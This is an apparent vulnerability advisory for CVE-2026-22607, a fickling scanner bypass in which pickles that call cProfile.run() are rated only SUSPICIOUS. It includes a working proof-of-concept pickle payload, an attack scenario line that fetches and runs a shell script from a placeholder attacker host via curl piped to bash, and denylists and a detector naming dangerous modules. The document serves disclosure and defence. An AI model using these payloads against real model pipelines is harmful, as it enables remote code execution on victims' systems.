CVE-2026-22607: fickling: Allowlist Bypass evades input filtering

GHSA-p523-jq9w-64x9 · HIGH · PoC available · CISA SSVC: Attend
Published January 9, 2026
CISO Take

Fickling, the Trail of Bits pickle security scanner widely used as a security gate in ML pipelines, fails to flag `cProfile.run()` as overtly malicious, rating it SUSPICIOUS instead of OVERTLY_MALICIOUS even though it enables full RCE. Any pipeline that uses fickling ≤ 0.1.6 to vet model files before loading has a false sense of security. Upgrade to fickling 0.1.7 immediately and re-scan all files previously rated SUSPICIOUS.

Risk Assessment

HIGH. Exploitation is trivial — a 10-line Python script generates the malicious pickle with zero prerequisite knowledge. The blast radius is significant because fickling is purpose-built as a security control; bypassing it means the entire ML supply chain security layer is neutralized. Exposure is broad: any team running fickling scans on externally-sourced model files (from HuggingFace, MLflow, shared repos, or CI/CD pipelines) is affected. CVSS is unscored but functionally equivalent to a CVSS 8.8+ given reliable RCE with no special privileges and minimal attack complexity.

Affected Systems

| Package | Ecosystem | Vulnerable Range | Patched |
|----------|-----------|------------------|---------|
| fickling | pip | <= 0.1.6 | 0.1.7 |


Severity & Risk

- CVSS 3.1: N/A
- EPSS: 0.1% chance of exploitation in 30 days (higher than 20% of all CVEs)
- Exploitation Status: Exploit available
- Exploitation: Medium
- Sophistication: Trivial
- Exploitation Confidence: Medium
- CISA SSVC: Public PoC
- Public PoC indexed (trickest/cve)

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Recommended Action

  1. Patch immediately

    Upgrade fickling to 0.1.7 (pip install --upgrade fickling).

  2. Re-scan suspicious files

    Re-run fickling 0.1.7 against all pickle files previously rated SUSPICIOUS — some may be reclassified as OVERTLY_MALICIOUS.

  3. Defense in depth

    Never rely solely on fickling; layer with sandboxed execution environments (e.g., gVisor, Firecracker) when loading externally-sourced models.

  4. Format migration

    Where possible, migrate from pickle to safer serialization formats (SafeTensors, ONNX, TorchScript) that remove or sharply reduce deserialization code-execution risk.

  5. Detection

    Search codebase and CI logs for fickling calls that act on SUSPICIOUS-rated results without blocking — treat these as security gaps.

  6. Block cProfile in upstream

    If using a custom allowlist/blocklist approach, add cProfile, cProfile.run, cProfile.runctx, and _lsprof to denied imports.
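
The denylist in step 6 can also be enforced independently of fickling with a static pass over the pickle opcode stream; nothing is deserialized or executed. The sketch below uses the stdlib `pickletools.genops` to flag denied module imports in both the classic GLOBAL form and the protocol-4 STACK_GLOBAL form. `DENIED_MODULES` and `flags_denied_import` are illustrative names invented here, not fickling API, and the module list is a starting point, not a complete blocklist:

```python
import pickle
import pickletools

# Illustrative denylist of stdlib modules whose import inside a pickle
# stream should be treated as malicious. Extend for your environment.
DENIED_MODULES = {
    "os", "subprocess", "builtins", "runpy", "pty",
    "cProfile", "_lsprof",  # CVE-2026-22607: cProfile.run executes code strings
}

def flags_denied_import(data: bytes) -> bool:
    """Return True if the pickle byte stream references a denied module.

    Walks opcodes with pickletools.genops without executing anything.
    GLOBAL carries "module name" as a single space-joined string argument;
    STACK_GLOBAL resolves the module from the two most recently pushed
    string constants (module, then attribute name).
    """
    strings = []  # string constants seen so far, in push order
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":
            module = arg.split(" ", 1)[0]
            if module.split(".")[0] in DENIED_MODULES:
                return True
        elif opcode.name == "STACK_GLOBAL":
            if len(strings) >= 2 and strings[-2].split(".")[0] in DENIED_MODULES:
                return True
        if isinstance(arg, str):
            strings.append(arg)
    return False

# Demo: build a CVE-style payload in memory and scan it without loading it.
class _Payload:
    def __reduce__(self):
        import cProfile
        return (cProfile.run, ("print('rce')",))

malicious = pickle.dumps(_Payload())
benign = pickle.dumps({"weights": [1, 2, 3]})
print(flags_denied_import(malicious))  # True
print(flags_denied_import(benign))     # False
```

Because this check only inspects opcodes, it is safe to run on untrusted files; it is a complement to, not a replacement for, fickling's broader analyses.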

CISA SSVC Assessment

| Factor | Value |
|--------|-------|
| Decision | Attend |
| Exploitation | PoC |
| Automatable | Yes |
| Technical Impact | Total |

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act

- Article 15 - Accuracy, robustness and cybersecurity
- Article 9 - Risk management system

ISO 42001

- A.6.1.4 - AI system security testing and evaluation
- A.6.2.3 - AI supply chain risk management
- A.8.2 - AI system security testing and verification
- A.8.3 - AI supply chain management

NIST AI RMF

- GOVERN 1.7 - Processes for identifying and managing AI risks
- GOVERN 6.1 - Policies and procedures for AI risk and trustworthiness
- MANAGE 2.2 - Treatments, responses, and controls are selected and applied to address AI risks
- MANAGE 2.4 - Mechanisms for tracking and addressing identified AI risks

OWASP LLM Top 10

- LLM03:2025 - Supply Chain Vulnerabilities
- LLM05:2025 - Insecure Plugin Design / Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2026-22607?

Fickling, the Trail of Bits pickle security scanner widely used as a security gate in ML pipelines, fails to flag `cProfile.run()` as overtly malicious, rating it SUSPICIOUS instead of OVERTLY_MALICIOUS even though it enables full RCE. Any pipeline that uses fickling ≤ 0.1.6 to vet model files before loading has a false sense of security. Upgrade to fickling 0.1.7 immediately and re-scan all files previously rated SUSPICIOUS.

Is CVE-2026-22607 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2026-22607, increasing the risk of exploitation.

How to fix CVE-2026-22607?

1. **Patch immediately**: Upgrade fickling to 0.1.7 (`pip install --upgrade fickling`).
2. **Re-scan suspicious files**: Re-run fickling 0.1.7 against all pickle files previously rated SUSPICIOUS; some may be reclassified as OVERTLY_MALICIOUS.
3. **Defense in depth**: Never rely solely on fickling; layer with sandboxed execution environments (e.g., gVisor, Firecracker) when loading externally-sourced models.
4. **Format migration**: Where possible, migrate from pickle to safer serialization formats (SafeTensors, ONNX, TorchScript) that remove or sharply reduce deserialization code-execution risk.
5. **Detection**: Search codebase and CI logs for fickling calls that act on SUSPICIOUS-rated results without blocking; treat these as security gaps.
6. **Block cProfile upstream**: If using a custom allowlist/blocklist approach, add `cProfile`, `cProfile.run`, `cProfile.runctx`, and `_lsprof` to denied imports.

What systems are affected by CVE-2026-22607?

This vulnerability affects the following AI/ML architecture patterns: model serving, training pipelines, ML artifact registries and CI/CD pipelines, model validation and security scanning tooling.

What is the CVSS score for CVE-2026-22607?

No CVSS score has been assigned yet.

Technical Details

NVD Description

# Fickling's assessment

`cProfile` was added to the list of unsafe imports (https://github.com/trailofbits/fickling/commit/dc8ae12966edee27a78fe05c5745171a2b138d43).

# Original report

## Description

### Summary

Fickling versions up to and including 0.1.6 do not treat Python's `cProfile` module as unsafe. Because of this, a malicious pickle that uses `cProfile.run()` is classified as SUSPICIOUS instead of OVERTLY_MALICIOUS. If a user relies on Fickling's output to decide whether a pickle is safe to deserialize, this misclassification can lead them to execute attacker-controlled code on their system. This affects any workflow or product that uses Fickling as a security gate for pickle deserialization.

### Details

The `cProfile` module is missing from fickling's blocklist of unsafe module imports in `fickling/analysis.py`. This is the same root cause as CVE-2025-67748 (pty) and CVE-2025-67747 (marshal/types).

Incriminated source code:

- File: `fickling/analysis.py`
- Class: `UnsafeImports`
- Issue: The blocklist does not include `cProfile`, `cProfile.run`, or `cProfile.runctx`

Reference to similar fix:

- PR #187 added `pty` to the blocklist to fix CVE-2025-67748
- PR #108 documented the blocklist approach
- The same fix pattern should be applied for `cProfile`

How the bypass works:

1. Attacker creates a pickle using `cProfile.run()` in `__reduce__`
2. `cProfile.run()` accepts a Python code string and executes it directly (C-accelerated version of `profile.run`)
3. Fickling's `UnsafeImports` analysis does not flag `cProfile` as dangerous
4. Only the `UnusedVariables` heuristic triggers, resulting in SUSPICIOUS severity
5. The pickle should be rated OVERTLY_MALICIOUS like `os.system`, `eval`, and `exec`

Tested behavior (fickling 0.1.6):

| Function | Fickling Severity | RCE Capable |
|----------|-------------------|-------------|
| os.system | LIKELY_OVERTLY_MALICIOUS | Yes |
| eval | OVERTLY_MALICIOUS | Yes |
| exec | OVERTLY_MALICIOUS | Yes |
| cProfile.run | SUSPICIOUS | Yes ← BYPASS |
| cProfile.runctx | SUSPICIOUS | Yes ← BYPASS |

Suggested fix: Add to the unsafe imports blocklist in `fickling/analysis.py`:

- `cProfile`
- `cProfile.run`
- `cProfile.runctx`
- `_lsprof` (underlying C module)

## PoC

Complete instructions, including specific configuration details, to reproduce the vulnerability.

Environment:

- Python 3.13.2
- fickling 0.1.6 (latest version, installed via pip)

### Step 1: Create malicious pickle

```python
import pickle
import cProfile

class MaliciousPayload:
    def __reduce__(self):
        return (cProfile.run, ("print('CPROFILE_RCE_CONFIRMED')",))

with open("malicious.pkl", "wb") as f:
    pickle.dump(MaliciousPayload(), f)
```

### Step 2: Analyze with fickling

```python
from fickling.fickle import Pickled
from fickling.analysis import check_safety

with open('malicious.pkl', 'rb') as f:
    data = f.read()

pickled = Pickled.load(data)
result = check_safety(pickled)
print(f"Severity: {result.severity}")
print(f"Analysis: {result}")
```

Expected output (if properly detected):

```
Severity: Severity.OVERTLY_MALICIOUS
```

Actual output (bypass confirmed):

```
Severity: Severity.SUSPICIOUS
Analysis: Variable `_var0` is assigned value `run(...)` but unused afterward; this is suspicious and indicative of a malicious pickle file
```

### Step 3: Prove RCE by loading the pickle

```bash
python -c "import pickle; pickle.load(open('malicious.pkl', 'rb'))"
```

Output:

```
CPROFILE_RCE_CONFIRMED
         4 function calls in 0.000 seconds

   Ordered by: standard name

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
        1    0.000    0.000    0.000    0.000 <string>:1(<module>)
        1    0.000    0.000    0.000    0.000 {built-in method builtins.exec}
        1    0.000    0.000    0.000    0.000 {built-in method builtins.print}
        1    0.000    0.000    0.000    0.000 {method 'disable' of '_lsprof.Profiler' objects}
```

Check: The code executes, proving RCE.

### Pickle disassembly (evidence):

```
    0: \x80 PROTO      5
    2: \x95 FRAME      58
   11: \x8c SHORT_BINUNICODE 'cProfile'
   21: \x94 MEMOIZE    (as 0)
   22: \x8c SHORT_BINUNICODE 'run'
   27: \x94 MEMOIZE    (as 1)
   28: \x93 STACK_GLOBAL
   29: \x94 MEMOIZE    (as 2)
   30: \x8c SHORT_BINUNICODE "print('CPROFILE_RCE_CONFIRMED')"
   63: \x94 MEMOIZE    (as 3)
   64: \x85 TUPLE1
   65: \x94 MEMOIZE    (as 4)
   66: R    REDUCE
   67: \x94 MEMOIZE    (as 5)
   68: .    STOP
highest protocol among opcodes = 4
```

## Impact

Vulnerability Type: Incomplete blocklist leading to safety check bypass (CWE-184) and arbitrary code execution via insecure deserialization (CWE-502).

Who is impacted: Any user or system that relies on fickling to vet pickle files for security issues before loading them. This includes:

- ML model validation pipelines
- Model hosting platforms (Hugging Face, MLflow, etc.)
- Security scanning tools that use fickling
- CI/CD pipelines that validate pickle artifacts

Attack scenario: An attacker uploads a malicious ML model or pickle file to a model repository. The victim's pipeline uses fickling to scan uploads. Fickling rates the file as "SUSPICIOUS" (not "OVERTLY_MALICIOUS"), so the file is not rejected. When the victim loads the model, arbitrary code executes on their system.

Why `cProfile.run()` is dangerous: Unlike `runpy.run_path()`, which requires a file on disk, `cProfile.run()` takes a code string directly, so the entire attack is self-contained in the pickle; no external files are needed. The Python docs explicitly state that `cProfile.run()` takes "a single argument that can be passed to the exec() function". `cProfile` is the C-accelerated version and is more commonly available than `profile`. It is also the recommended profiler per the Python docs ("cProfile is recommended for most users"), so it is present in virtually all Python installations.

Severity: HIGH

- The attacker achieves arbitrary code execution
- The security control (fickling) is specifically designed to prevent this
- The bypass requires no special conditions beyond crafting the pickle with cProfile
- The attack is fully self-contained (no external files needed)
- cProfile is more commonly used than profile, increasing attack surface

Exploitation Scenario

An adversary targets an organization that accepts community-contributed ML models (e.g., a fine-tuned LLM or classifier). They craft a malicious `.pkl` file embedding `cProfile.run('import os; os.system("curl attacker.com/shell.sh | bash")')` in a `__reduce__` method. The file is submitted to the target's model registry or shared via a GitHub pull request. The victim's CI/CD pipeline runs fickling's `check_safety()`; fickling 0.1.6 returns SUSPICIOUS rather than OVERTLY_MALICIOUS, which the pipeline treats as a non-blocking warning. The model is approved and loaded by a downstream job. The cProfile call executes the embedded code string, establishing a reverse shell or exfiltrating credentials. The attack requires no external files, no victim interaction beyond normal model loading, and leaves minimal forensic trace, since cProfile is a legitimate Python stdlib module.
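
The pipeline's failure mode above is a gate policy that blocks only on the top severity tier. A fail-closed policy can be sketched as follows; the `Severity` enum here is an illustrative mirror of the tier names that appear in this advisory (plus a hypothetical `LIKELY_SAFE` baseline), not fickling's actual enum:

```python
from enum import IntEnum

# Illustrative severity ladder, ordered so that comparisons reflect risk.
# LIKELY_SAFE is a hypothetical baseline tier added for this sketch.
class Severity(IntEnum):
    LIKELY_SAFE = 0
    SUSPICIOUS = 1
    LIKELY_OVERTLY_MALICIOUS = 2
    OVERTLY_MALICIOUS = 3

def gate(severity: Severity) -> bool:
    """Fail closed: allow only results strictly below SUSPICIOUS.

    The vulnerable pipeline in the scenario above blocked only on
    OVERTLY_MALICIOUS, which is exactly the gap the cProfile payload
    walked through at SUSPICIOUS.
    """
    return severity < Severity.SUSPICIOUS

print(gate(Severity.SUSPICIOUS))   # False: blocked
print(gate(Severity.LIKELY_SAFE))  # True: allowed
```

Treating SUSPICIOUS as blocking would have stopped this attack even on fickling 0.1.6, at the cost of more manual review of false positives.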

Timeline

Published
January 9, 2026
Last Modified
January 11, 2026
First Seen
March 24, 2026

Related Vulnerabilities